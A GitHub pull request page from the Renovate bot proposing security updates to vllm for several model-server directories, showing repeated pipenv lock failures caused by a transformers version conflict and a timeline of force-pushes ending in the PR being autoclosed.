(line 29) and transformers~=4.40.2 because these package versions have 
conflicting dependencies.
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0
Additionally, some packages in these conflicts have no matching distributions 
available for your environment:
    transformers
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip to attempt to solve the dependency 
conflict
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
Hint: try $ pipenv lock --verbose to see the full dependency resolution output.
ERROR: ResolutionImpossible: for help visit 
https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-depende
ncy-conflicts
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0

Hint: Re-run with --verbose to see the full dependency resolution output and 
identify which packages are in conflict.
Traceback (most recent call last):
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/routines/lock.py", line 94, in do_lock
    venv_resolve_deps(
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1449, in venv_resolve_deps
    c = resolve(cmd, st, project=project)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1233, in resolve
    raise ResolutionFailure("Failed to lock Pipfile.lock!")
pipenv.exceptions.ResolutionFailure: ERROR: Failed to lock Pipfile.lock!


File name: model-servers/vllm/0.6.6/Pipfile.lock
Command failed: pipenv lock
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-ytcmq9dj-requirements/pipenv-fvbu3k84-constraints.txt 
(line 30) and transformers~=4.40.2 because these package versions have 
conflicting dependencies.
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0
Additionally, some packages in these conflicts have no matching distributions 
available for your environment:
    transformers
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip to attempt to solve the dependency 
conflict
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
Hint: try $ pipenv lock --verbose to see the full dependency resolution output.
ERROR: ResolutionImpossible: for help visit 
https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-depende
ncy-conflicts
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0

Hint: Re-run with --verbose to see the full dependency resolution output and 
identify which packages are in conflict.
Traceback (most recent call last):
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/routines/lock.py", line 94, in do_lock
    venv_resolve_deps(
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1449, in venv_resolve_deps
    c = resolve(cmd, st, project=project)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1233, in resolve
    raise ResolutionFailure("Failed to lock Pipfile.lock!")
pipenv.exceptions.ResolutionFailure: ERROR: Failed to lock Pipfile.lock!


File name: model-servers/vllm/0.8.4/Pipfile.lock
Command failed: pipenv lock
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-ceru2uo2-requirements/pipenv-setjjfaa-constraints.txt 
(line 15) and transformers~=4.40.2 because these package versions have 
conflicting dependencies.
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0
Additionally, some packages in these conflicts have no matching distributions 
available for your environment:
    transformers
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip to attempt to solve the dependency 
conflict
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
Hint: try $ pipenv lock --verbose to see the full dependency resolution output.
ERROR: ResolutionImpossible: for help visit 
https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-depende
ncy-conflicts
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0

Hint: Re-run with --verbose to see the full dependency resolution output and 
identify which packages are in conflict.
Traceback (most recent call last):
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/routines/lock.py", line 94, in do_lock
    venv_resolve_deps(
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1449, in venv_resolve_deps
    c = resolve(cmd, st, project=project)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1233, in resolve
    raise ResolutionFailure("Failed to lock Pipfile.lock!")
pipenv.exceptions.ResolutionFailure: ERROR: Failed to lock Pipfile.lock!


@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 4781d93 to a70fcd1 Compare August 11, 2025 07:27
@renovate renovate Bot requested a review from a team as a code owner August 11, 2025 07:27
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from a70fcd1 to 27c0fb1 Compare August 21, 2025 16:42
@renovate renovate Bot changed the title Update dependency vllm to v0.9.0 [SECURITY] Update dependency vllm to v0.10.1.1 [SECURITY] Aug 21, 2025
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 27c0fb1 to bcb2a4f Compare September 25, 2025 21:28
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from bcb2a4f to fb53a3d Compare October 7, 2025 18:12
@renovate renovate Bot changed the title Update dependency vllm to v0.10.1.1 [SECURITY] Update dependency vllm to v0.11.0 [SECURITY] Oct 7, 2025
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from fb53a3d to fa25622 Compare October 22, 2025 01:10
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from fa25622 to 5b769e6 Compare November 21, 2025 06:43
@renovate renovate Bot changed the title Update dependency vllm to v0.11.0 [SECURITY] Update dependency vllm to v0.11.1 [SECURITY] Nov 22, 2025
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 5b769e6 to ac59da5 Compare January 9, 2026 09:41
@renovate renovate Bot changed the title Update dependency vllm to v0.11.1 [SECURITY] Update dependency vllm [SECURITY] Jan 9, 2026
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from ac59da5 to 4081aeb Compare January 14, 2026 09:06
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 4081aeb to ebfedd4 Compare January 21, 2026 18:39
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from ebfedd4 to f2453df Compare January 28, 2026 18:52
@renovate renovate Bot changed the title Update dependency vllm [SECURITY] Update dependency vllm to v0.14.1 [SECURITY] Jan 28, 2026
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from f2453df to 72daf4b Compare March 31, 2026 17:14
@renovate renovate Bot changed the title Update dependency vllm to v0.14.1 [SECURITY] Update dependency vllm [SECURITY] Mar 31, 2026
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 72daf4b to 1bd2543 Compare April 15, 2026 12:40
@renovate renovate Bot changed the title Update dependency vllm [SECURITY] Update dependency vllm to v0.19.0 [SECURITY] Apr 15, 2026
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 1bd2543 to 08ea896 Compare May 6, 2026 02:59
@renovate renovate Bot changed the title Update dependency vllm to v0.19.0 [SECURITY] Update dependency vllm to v0.20.0 [SECURITY] May 7, 2026
Signed-off-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 08ea896 to 61076f5 Compare June 13, 2026 00:20
@renovate renovate Bot changed the title Update dependency vllm to v0.20.0 [SECURITY] Update dependency vllm to v0.22.0 [SECURITY] Jun 14, 2026
@renovate renovate Bot changed the title Update dependency vllm to v0.22.0 [SECURITY] Update dependency vllm to v0.22.0 [SECURITY] - autoclosed Jun 17, 2026
@renovate renovate Bot closed this Jun 17, 2026
@renovate renovate Bot deleted the renovate/pypi-vllm-vulnerability branch June 17, 2026 19:00
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants